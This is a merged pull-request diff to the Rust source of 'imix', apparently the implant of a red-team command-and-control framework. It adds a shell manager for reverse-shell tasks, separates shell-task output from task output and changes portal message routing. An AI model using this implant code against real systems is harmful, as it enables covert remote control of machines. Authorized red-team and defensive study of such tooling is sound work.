Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
138 changes: 109 additions & 29 deletions implants/imix/src/agent.rs
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,7 @@ use tokio::sync::RwLock;
use transport::Transport;

use crate::portal::run_create_portal;
use crate::shell::manager::{ShellManager, ShellManagerMessage};
use crate::shell::{run_repl_reverse_shell, run_reverse_shell_pty};
use crate::task::TaskRegistry;

Expand All @@ -25,6 +26,7 @@ pub struct ImixAgent<T: Transport> {
pub subtasks: Arc<Mutex<BTreeMap<i64, tokio::task::JoinHandle<()>>>>,
pub output_tx: std::sync::mpsc::SyncSender<c2::ReportTaskOutputRequest>,
pub output_rx: Arc<Mutex<std::sync::mpsc::Receiver<c2::ReportTaskOutputRequest>>>,
pub shell_manager_tx: tokio::sync::mpsc::Sender<ShellManagerMessage>,
}

impl<T: Transport + Sync + 'static> ImixAgent<T> {
Expand All @@ -33,8 +35,10 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
transport: T,
runtime_handle: tokio::runtime::Handle,
task_registry: Arc<TaskRegistry>,
shell_manager_tx: tokio::sync::mpsc::Sender<ShellManagerMessage>,
) -> Self {
let (output_tx, output_rx) = std::sync::mpsc::sync_channel(MAX_BUF_OUTPUT_MESSAGES);

Self {
config: Arc::new(RwLock::new(config)),
transport: Arc::new(RwLock::new(transport)),
Expand All @@ -43,9 +47,14 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
subtasks: Arc::new(Mutex::new(BTreeMap::new())),
output_tx,
output_rx: Arc::new(Mutex::new(output_rx)),
shell_manager_tx,
}
}

pub fn start_shell_manager(self: Arc<Self>, manager: ShellManager<T>) {
self.runtime_handle.spawn(manager.run());
}

pub fn get_callback_interval_u64(&self) -> Result<u64> {
// Blocks on read, but it's fast
let cfg = self
Expand Down Expand Up @@ -104,20 +113,23 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
return;
}

let mut merged_outputs: BTreeMap<i64, c2::ReportTaskOutputRequest> = BTreeMap::new();
for output in outputs {
let task_id = output
.context
.as_ref()
.map(|c| c.task_id)
.unwrap_or_default();
let mut merged_task_outputs: BTreeMap<i64, c2::ReportTaskOutputRequest> = BTreeMap::new();
let mut merged_shell_outputs: BTreeMap<i64, c2::ReportTaskOutputRequest> = BTreeMap::new();

use std::collections::btree_map::Entry;
match merged_outputs.entry(task_id) {
Entry::Occupied(mut entry) => {
let existing = entry.get_mut();
if let Some(existing_out) = &mut existing.output {
if let Some(new_out) = &output.output {
for output in outputs {
// Handle Task Output
if let Some(new_out) = &output.output {
let task_id = output
.context
.as_ref()
.map(|c| c.task_id)
.unwrap_or_default();

use std::collections::btree_map::Entry;
match merged_task_outputs.entry(task_id) {
Entry::Occupied(mut entry) => {
let existing = entry.get_mut();
if let Some(existing_out) = &mut existing.output {
existing_out.output.push_str(&new_out.output);
match (&mut existing_out.error, &new_out.error) {
(Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg),
Expand All @@ -127,18 +139,59 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
if new_out.exec_finished_at.is_some() {
existing_out.exec_finished_at = new_out.exec_finished_at.clone();
}
} else {
existing.output = Some(new_out.clone());
}
existing.context = output.context.clone();
}
Entry::Vacant(entry) => {
let req = c2::ReportTaskOutputRequest {
output: Some(new_out.clone()),
context: output.context.clone(),
shell_task_output: None,
};
entry.insert(req);
}
existing.context = output.context.clone();
}
Entry::Vacant(entry) => {
entry.insert(output);
}

// Handle Shell Task Output
if let Some(new_shell_out) = &output.shell_task_output {
let shell_task_id = new_shell_out.id;

use std::collections::btree_map::Entry;
match merged_shell_outputs.entry(shell_task_id) {
Entry::Occupied(mut entry) => {
let existing = entry.get_mut();
if let Some(existing_out) = &mut existing.shell_task_output {
existing_out.output.push_str(&new_shell_out.output);
match (&mut existing_out.error, &new_shell_out.error) {
(Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg),
(None, Some(e2)) => existing_out.error = Some(e2.clone()),
_ => {}
}
if new_shell_out.exec_finished_at.is_some() {
existing_out.exec_finished_at =
new_shell_out.exec_finished_at.clone();
}
} else {
existing.shell_task_output = Some(new_shell_out.clone());
}
}
Entry::Vacant(entry) => {
let req = c2::ReportTaskOutputRequest {
output: None,
context: None,
shell_task_output: Some(new_shell_out.clone()),
};
entry.insert(req);
}
}
}
}

let mut transport = self.transport.write().await;
for (_, output) in merged_outputs {
for (_, output) in merged_task_outputs {
#[cfg(debug_assertions)]
log::info!("Task Output: {output:#?}");

Expand All @@ -147,6 +200,16 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
log::error!("Failed to report task output: {_e}");
}
}

for (_, output) in merged_shell_outputs {
#[cfg(debug_assertions)]
log::info!("Shell Task Output: {output:#?}");

if let Err(_e) = transport.report_task_output(output).await {
#[cfg(debug_assertions)]
log::error!("Failed to report shell task output: {_e}");
}
}
}

// Helper to get config URIs for creating new transport
Expand Down Expand Up @@ -191,7 +254,7 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
}

// Helper to claim tasks and return them, so main can spawn
pub async fn claim_tasks(&self) -> Result<Vec<pb::c2::Task>> {
pub async fn claim_tasks(&self) -> Result<c2::ClaimTasksResponse> {
let mut transport = self.transport.write().await;
let beacon_info = self.config.read().await.info.clone();
let req = ClaimTasksRequest {
Expand All @@ -201,23 +264,39 @@ impl<T: Transport + Sync + 'static> ImixAgent<T> {
.claim_tasks(req)
.await
.context("Failed to claim tasks")?;
Ok(response.tasks)
Ok(response)
}

pub async fn process_job_request(&self) -> Result<()> {
let tasks = self.claim_tasks().await?;
if tasks.is_empty() {
return Ok(());
let resp = self.claim_tasks().await?;

let mut has_work = false;

if !resp.tasks.is_empty() {
has_work = true;
let registry = self.task_registry.clone();
let agent = Arc::new(self.clone());
for task in resp.tasks {
#[cfg(debug_assertions)]
log::info!("Claimed task {}: JWT={}", task.id, task.jwt);

registry.spawn(task, agent.clone());
}
}

let registry = self.task_registry.clone();
let agent = Arc::new(self.clone());
for task in tasks {
#[cfg(debug_assertions)]
log::info!("Claimed task {}: JWT={}", task.id, task.jwt);
if !resp.shell_tasks.is_empty() {
has_work = true;
for shell_task in resp.shell_tasks {
let _ = self
.shell_manager_tx
.try_send(ShellManagerMessage::ProcessTask(shell_task));
}
}

registry.spawn(task, agent.clone());
if !has_work {
return Ok(());
}

Ok(())
}

Expand Down Expand Up @@ -339,8 +418,9 @@ impl<T: Transport + Send + Sync + 'static> Agent for ImixAgent<T> {
}

fn create_portal(&self, task_context: TaskContext) -> Result<(), String> {
let shell_manager_tx = self.shell_manager_tx.clone();
self.spawn_subtask(task_context.task_id, move |transport| async move {
run_create_portal(task_context, transport).await
run_create_portal(task_context, transport, shell_manager_tx).await
})
}

Expand Down
1 change: 1 addition & 0 deletions implants/imix/src/lib.rs
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@ extern crate alloc;
pub mod agent;
pub mod assets;
pub mod portal;
pub mod printer;
pub mod run;
pub mod shell;
pub mod task;
Expand Down
1 change: 1 addition & 0 deletions implants/imix/src/main.rs
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,7 @@ mod agent;
mod assets;
mod install;
mod portal;
mod printer;
mod run;
mod shell;
mod task;
Expand Down
5 changes: 4 additions & 1 deletion implants/imix/src/portal/mod.rs
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
use crate::shell::manager::ShellManagerMessage;
use anyhow::Result;
use pb::c2::TaskContext;
use tokio::sync::mpsc;
use transport::Transport;

pub mod bytes;
Expand All @@ -10,6 +12,7 @@ pub mod udp;
pub async fn run_create_portal<T: Transport + Send + Sync + 'static>(
task_context: TaskContext,
transport: T,
shell_manager_tx: mpsc::Sender<ShellManagerMessage>,
) -> Result<()> {
run::run(task_context, transport).await
run::run(task_context, transport, shell_manager_tx).await
}
20 changes: 17 additions & 3 deletions implants/imix/src/portal/run.rs
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,8 @@ use std::time::{SystemTime, UNIX_EPOCH};
use tokio::sync::mpsc;
use transport::Transport;

use crate::shell::manager::ShellManagerMessage;

use super::{bytes, tcp, udp};

/// Context for a single stream ID
Expand All @@ -20,12 +22,13 @@ struct StreamContext {
pub async fn run<T: Transport + Send + Sync + 'static>(
task_context: TaskContext,
mut transport: T,
shell_manager_tx: mpsc::Sender<ShellManagerMessage>,
) -> Result<()> {
let (req_tx, req_rx) = mpsc::channel::<CreatePortalRequest>(100);
let (resp_tx, mut resp_rx) = mpsc::channel::<CreatePortalResponse>(100);

// Start transport loop
// Note: We use a separate task for transport since it might block or be long-running
// Note: We use a separate task for transport since it might be long-running
let transport_handle = tokio::spawn(async move {
if let Err(_e) = transport.create_portal(req_rx, resp_tx).await {
#[cfg(debug_assertions)]
Expand Down Expand Up @@ -68,7 +71,7 @@ pub async fn run<T: Transport + Send + Sync + 'static>(
Some(resp) => {
#[allow(clippy::collapsible_if)]
if let Some(mote) = resp.mote {
if let Err(_e) = handle_incoming_mote(mote, &mut streams, &out_tx, &mut tasks).await {
if let Err(_e) = handle_incoming_mote(mote, &mut streams, &out_tx, &mut tasks, &shell_manager_tx).await {
#[cfg(debug_assertions)]
log::error!("Error handling incoming mote: {}", _e);
}
Expand Down Expand Up @@ -121,6 +124,7 @@ async fn handle_incoming_mote(
streams: &mut HashMap<String, StreamContext>,
out_tx: &mpsc::Sender<Mote>,
tasks: &mut Vec<tokio::task::JoinHandle<()>>,
shell_manager_tx: &mpsc::Sender<ShellManagerMessage>,
) -> Result<()> {
// Handle Trace Mote
if let Some(Payload::Bytes(ref mut bytes_payload)) = mote.payload
Expand All @@ -143,6 +147,16 @@ async fn handle_incoming_mote(
return Ok(());
}

// Handle Shell Mote
let is_shell = matches!(mote.payload, Some(Payload::Shell(_)));
if is_shell {
let _ = shell_manager_tx.try_send(ShellManagerMessage::ProcessPortalPayload(
mote,
out_tx.clone(),
));
return Ok(());
}

let stream_id = mote.stream_id.clone();

// Get or create context
Expand Down Expand Up @@ -243,7 +257,7 @@ async fn stream_handler(
Payload::Bytes(_) => bytes::handle_bytes(first_mote, rx, out_tx, sequencer).await,
Payload::Shell(_) => {
#[cfg(debug_assertions)]
log::warn!("Shell payloads are not supported in this portal implementation");
log::warn!("Shell payloads should have been intercepted before stream handler");
Ok(())
}
}
Expand Down
26 changes: 26 additions & 0 deletions implants/imix/src/printer.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
use eldritch::{Printer, Span};
use tokio::sync::mpsc::UnboundedSender;

#[derive(Debug)]
pub struct StreamPrinter {
tx: UnboundedSender<String>,
error_tx: UnboundedSender<String>,
}

impl StreamPrinter {
pub fn new(tx: UnboundedSender<String>, error_tx: UnboundedSender<String>) -> Self {
Self { tx, error_tx }
}
}

impl Printer for StreamPrinter {
fn print_out(&self, _span: &Span, s: &str) {
// We format with newline to match BufferPrinter behavior which separates lines
let _ = self.tx.send(format!("{}\n", s));
}

fn print_err(&self, _span: &Span, s: &str) {
// We format with newline to match BufferPrinter behavior
let _ = self.error_tx.send(format!("{}\n", s));
}
}
9 changes: 9 additions & 0 deletions implants/imix/src/run.rs
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,7 @@ use pb::config::Config;
use transport::{ActiveTransport, Transport};

pub static SHUTDOWN: AtomicBool = AtomicBool::new(false);
const MAX_BUF_SHELL_MESSAGES: usize = 65535;

pub async fn run_agent() -> Result<()> {
init_logger();
Expand All @@ -26,13 +27,21 @@ pub async fn run_agent() -> Result<()> {

let handle = tokio::runtime::Handle::current();
let task_registry = Arc::new(TaskRegistry::new());

let (shell_manager_tx, shell_manager_rx) = tokio::sync::mpsc::channel(MAX_BUF_SHELL_MESSAGES);

let agent = Arc::new(ImixAgent::new(
config,
transport,
handle,
task_registry.clone(),
shell_manager_tx,
));

// Start Shell Manager
let shell_manager = crate::shell::manager::ShellManager::new(agent.clone(), shell_manager_rx);
agent.clone().start_shell_manager(shell_manager);

// Track the last interval we slept for, as a fallback in case we fail to read the config
let mut last_interval = agent.get_callback_interval_u64().unwrap_or(5);

Expand Down
Loading
Loading